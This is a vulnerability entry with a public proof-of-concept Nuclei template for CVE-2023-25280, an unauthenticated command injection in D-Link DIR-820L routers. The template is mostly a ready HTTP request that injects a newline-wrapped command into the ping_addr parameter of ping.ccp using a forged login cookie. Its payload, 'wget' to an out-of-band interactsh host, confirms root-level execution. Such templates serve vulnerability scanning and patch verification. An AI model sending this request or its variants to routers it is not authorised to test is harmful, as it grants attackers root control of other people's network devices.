漏洞描述
OS Command injection vulnerability in D-Link DIR820LA1_FW105B03 allows attackers to escalate privileges to root via a crafted payload with the ping_addr parameter to ping.ccp.
CVE-2023-25280: D-Link DIR820LA1_FW105B03 'ping_addr' - OS Command Injection
PoC代码[已公开]
id: CVE-2023-25280
info:
name: D-Link DIR820LA1_FW105B03 'ping_addr' - OS Command Injection
author: pussycat0x
severity: critical
description: |
OS Command injection vulnerability in D-Link DIR820LA1_FW105B03 allows attackers to escalate privileges to root via a crafted payload with the ping_addr parameter to ping.ccp.
reference:
- https://github.com/migraine-sudo/D_Link_Vuln/tree/main/cmd%20Inject%20in%20pingV4Msg
- https://www.dlink.com/en/security-bulletin/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-25280
cwe-id: CWE-78
epss-score: 0.9359
epss-percentile: 0.99832
cpe: cpe:2.3:o:dlink:dir820la1_firmware:105b03:*:*:*:*:*:*:*
metadata:
vendor: dlink
product: dir820la1_firmware
tags: cve,cve2023,rce,unauth,kev,dlink
variables:
payload: "wget http://{{interactsh-url}}"
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- "status_code == 200"
- "contains(body, 'D-LINK')"
condition: and
internal: true
- raw:
- |
POST /ping.ccp HTTP/1.1
Host: {{Hostname}}
Accept: application/xml, text/xml, */*; q=0.01
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Origin: {{RootURL}}
Referer: {{RootURL}}/lan.asp
Cookie: hasLogin=1
ccp_act=pingV4Msg&ping_addr=%0a{{payload}}%0a
matchers:
- type: dsl
dsl:
- "contains(interactsh_protocol, 'http')"
- "status_code == 200"
condition: and
# digest: 490a00463044022076b9c593a593dc557b096f4f3ab52445d389e6c3f9fb774adc47c736b9814fe20220191f41d2d492975d60edb0e31ba968c3c7549b2be7e0161ead0d60a3a3af1f0a:922c64590222798bb761d5b6d8e72950